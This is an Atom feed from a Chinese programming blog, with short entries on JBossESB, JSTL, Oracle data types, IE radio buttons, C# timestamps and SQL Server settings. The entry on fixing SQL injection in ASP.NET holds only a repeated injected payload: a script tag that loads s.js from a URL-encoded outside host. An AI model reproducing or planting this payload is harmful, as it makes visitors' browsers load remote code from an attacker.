<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom"><title type="text">博客园_情走边锋</title><subtitle type="text">在平凡中也会有很多的快乐；有梦想，人才不会孤单学会放弃~</subtitle><id>http://feed.cnblogs.com/blog/u/10628/rss</id><updated>2010-06-07T07:24:56Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><generator>feed.cnblogs.com</generator><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/"/><link rel="self" type="application/atom+xml" href="http://feed.cnblogs.com/blog/u/10628/rss"/><entry><id>http://www.cnblogs.com/cliffever/archive/2009/08/24/1552683.html</id><title type="text">JBossESB问题记录</title><summary type="text">1，在jbossesb-4.6和jboss-4.2.3.GA集成的过程中，windows平台下的路径需要注意前面加上“/”，如下格式：org.jboss.esb.server.home=/D:/server/jboss-4.2.3.GAorg.jboss.esb.server.config=defaultorg.jboss.esb.tomcat.home=/D:/serve...</summary><published>2009-08-24T02:19:00Z</published><updated>2009-08-24T02:19:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2009/08/24/1552683.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2009/08/24/1552683.html"/><content type="text">1，在jbossesb-4.6和jboss-4.2.3.GA集成的过程中，windows平台下的路径需要注意前面加上“/”，如下格式：org.jboss.esb.server.home=/D:/server/jboss-4.2.3.GAorg.jboss.esb.server.config=defaultorg.jboss.esb.tomcat.home=/D:/serve...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/11/13/1333025.html</id><title type="text">jstl fmt功能说明</title><summary type="text">所有标签：Tags fmt:requestEncoding fmt:setLocale fmt:timeZone fmt:setTimeZone fmt:bundle fmt:setBundle fmt:message fmt:param fmt:formatNumber fmt:parseNumber fmt:formatDate fmt:parseDate &lt;%@ taglib uri=...</summary><published>2008-11-13T10:27:00Z</published><updated>2008-11-13T10:27:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1333025.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1333025.html"/><content type="text">所有标签：Tags fmt:requestEncoding fmt:setLocale fmt:timeZone fmt:setTimeZone fmt:bundle fmt:setBundle fmt:message fmt:param fmt:formatNumber fmt:parseNumber fmt:formatDate fmt:parseDate &lt;%@ taglib uri=...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/11/13/1332716.html</id><title type="text">oracle中number类型说明</title><summary type="text">1&gt;.NUMBER类型细讲：Oracle number datatype 语法：NUMBER[(precision [, scale])]简称：precision --&gt; p scale --&gt; sNUMBER(p, s)范围： 1 &lt;= p &lt;=38, -84 &lt;= s &lt;= 127保存数据范围：-1.0e-130 &lt;= number value ...</summary><published>2008-11-13T05:34:00Z</published><updated>2008-11-13T05:34:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1332716.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1332716.html"/><content type="text">1&gt;.NUMBER类型细讲：Oracle number datatype 语法：NUMBER[(precision [, scale])]简称：precision --&gt; p scale --&gt; sNUMBER(p, s)范围： 1 &lt;= p &lt;=38, -84 &lt;= s &lt;= 127保存数据范围：-1.0e-130 &lt;= number value ...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/10/27/1320436.html</id><title type="text">解决通过createElement创建出来的radio无法选中的问题</title><summary type="text">开发过程中，需要使用JS向页面动态添加radio，实现时通过document.createElement()方法来实现，刚开始的代码如下：[代码]结果在IE浏览器上生成的raido无法选中，而使用firefox浏览器却可以选中。后来试了下面的代码：[代码]结果在IE上生成的radio可以选中了，但firefox浏览器中却无效。为此，对于不同的浏览器，需要使用不同的方式来生成radio，这个可以通过...</summary><published>2008-10-27T06:29:00Z</published><updated>2008-10-27T06:29:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/10/27/1320436.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/10/27/1320436.html"/><content type="text">开发过程中，需要使用JS向页面动态添加radio，实现时通过document.createElement()方法来实现，刚开始的代码如下：[代码]结果在IE浏览器上生成的raido无法选中，而使用firefox浏览器却可以选中。后来试了下面的代码：[代码]结果在IE上生成的radio可以选中了，但firefox浏览器中却无效。为此，对于不同的浏览器，需要使用不同的方式来生成radio，这个可以通过...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/10/17/1313817.html</id><title type="text">asp.net C# 中使用timestamp</title><summary type="text">C# 中的 DateTime 值类型表示值范围在公元（基督纪元）0001 年 1 月 1 日午夜 12:00:00 到公元 (C.E.) 9999 年 12 月 31 日晚上 11:59:59 之间的日期和时间；而 Unix 的时间戳则表示的是自从 Unix 纪元（格林威治时间 1970 年 1 月 1 日 00:00:00）到当前时间的秒数。 C# 中似乎并没有内置的方法来完成两者之间的转换。[...</summary><published>2008-10-17T15:48:00Z</published><updated>2008-10-17T15:48:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/10/17/1313817.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/10/17/1313817.html"/><content type="text">C# 中的 DateTime 值类型表示值范围在公元（基督纪元）0001 年 1 月 1 日午夜 12:00:00 到公元 (C.E.) 9999 年 12 月 31 日晚上 11:59:59 之间的日期和时间；而 Unix 的时间戳则表示的是自从 Unix 纪元（格林威治时间 1970 年 1 月 1 日 00:00:00）到当前时间的秒数。 C# 中似乎并没有内置的方法来完成两者之间的转换。[...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/10/09/1307497.html</id><title type="text">编码 GBK 的不可映射字符 解决办法</title><summary type="text">这是因为：由于JDK是国际版的，在编译的时候，如果我们没有用-encoding参数指定我们的JAVA源程序的编码格式，则javac.exe首先获得我们操作系统默认采用的编码格式，也即在编译java程序时，若我们不指定源程序文件的编码格式，JDK首先获得操作系统的file.encoding参数(它保存的就是操作系统默认的编码格式，如WIN2k，它的值为GBK)，然后JDK就把我们的java源程序从f...</summary><published>2008-10-09T11:54:00Z</published><updated>2008-10-09T11:54:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/10/09/1307497.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/10/09/1307497.html"/><content type="text">这是因为：由于JDK是国际版的，在编译的时候，如果我们没有用-encoding参数指定我们的JAVA源程序的编码格式，则javac.exe首先获得我们操作系统默认采用的编码格式，也即在编译java程序时，若我们不指定源程序文件的编码格式，JDK首先获得操作系统的file.encoding参数(它保存的就是操作系统默认的编码格式，如WIN2k，它的值为GBK)，然后JDK就把我们的java源程序从f...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/05/27/1208045.html</id><title type="text">asp.net中SQL注入的解决办法</title><summary type="text">"&gt;&lt;/title&gt;&lt;script src=http://%73%61%79%38%2E%75%73/s.js&gt;&lt;/script&gt;&lt;!"&gt;&lt;/title&gt;&lt;script src=http://%73%61%79%38%2E%75%73/s.js&gt;&lt;/script&gt;&lt;!"&gt;&lt;/title&amp;gt...</summary><published>2008-05-26T16:59:00Z</published><updated>2008-05-26T16:59:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/05/27/1208045.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/05/27/1208045.html"/><content type="text">"&gt;&lt;/title&gt;&lt;script src=http://%73%61%79%38%2E%75%73/s.js&gt;&lt;/script&gt;&lt;!"&gt;&lt;/title&gt;&lt;script src=http://%73%61%79%38%2E%75%73/s.js&gt;&lt;/script&gt;&lt;!"&gt;&lt;/title&amp;gt...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/05/22/1205163.html</id><title type="text">SQL2005部署报表：用户IUSER_ 授予的权限不足的问题</title><summary type="text">一开始一直找不到，也试了一下在网上的各种方法，包括设置Report和ReportServer的虚拟目录的IUser访问，但是都没有，并且设置了IUser之后，报表管理器都没有办法访问，唉~~，后来还是采用默认值。通过http://localhost/report 进去之后才发现在属性的Tab里有一个安全性设置，呵呵，在这里加上 youmachine\Iuser用户的相应的权限，终于在我的Web里用...</summary><published>2008-05-22T12:27:00Z</published><updated>2008-05-22T12:27:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/05/22/1205163.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/05/22/1205163.html"/><content type="text">一开始一直找不到，也试了一下在网上的各种方法，包括设置Report和ReportServer的虚拟目录的IUser访问，但是都没有，并且设置了IUser之后，报表管理器都没有办法访问，唉~~，后来还是采用默认值。通过http://localhost/report 进去之后才发现在属性的Tab里有一个安全性设置，呵呵，在这里加上 youmachine\Iuser用户的相应的权限，终于在我的Web里用...</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/04/01/1133127.html</id><title type="text">发现一个网页幻灯制作的东西HTML Slidy</title><summary type="text">今天偶尔发现了一个网页幻灯制作的东西，HTML Slidy，很小巧，不过还是很有意思。可以在这里下载http://www.w3.org/Talks/Tools/Slidy/slidy.zip决定再去w3c里面淘一淘，看有没有其他好玩的东西</summary><published>2008-04-01T08:32:00Z</published><updated>2008-04-01T08:32:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/04/01/1133127.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/04/01/1133127.html"/><content type="text">今天偶尔发现了一个网页幻灯制作的东西，HTML Slidy，很小巧，不过还是很有意思。可以在这里下载http://www.w3.org/Talks/Tools/Slidy/slidy.zip决定再去w3c里面淘一淘，看有没有其他好玩的东西</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/03/16/1108750.html</id><title type="text">AS无法连接，由于目标机积极拒绝,无法连接。127.0.0.1:2382(system)</title><summary type="text">在用SQL Server Management Studio连接AS的时候，提示“请确认Sql Browser正在运行，由于目标机积极拒绝,无法连接。127.0.0.1:2382(system)”，但SqlBrowser已经运行了啊，查了一些资料后来将SQL Browser服务的登录设置为本地系统就可以了</summary><published>2008-03-16T13:25:00Z</published><updated>2008-03-16T13:25:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/03/16/1108750.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/03/16/1108750.html"/><content type="text">在用SQL Server Management Studio连接AS的时候，提示“请确认Sql Browser正在运行，由于目标机积极拒绝,无法连接。127.0.0.1:2382(system)”，但SqlBrowser已经运行了啊，查了一些资料后来将SQL Browser服务的登录设置为本地系统就可以了</content></entry></feed>
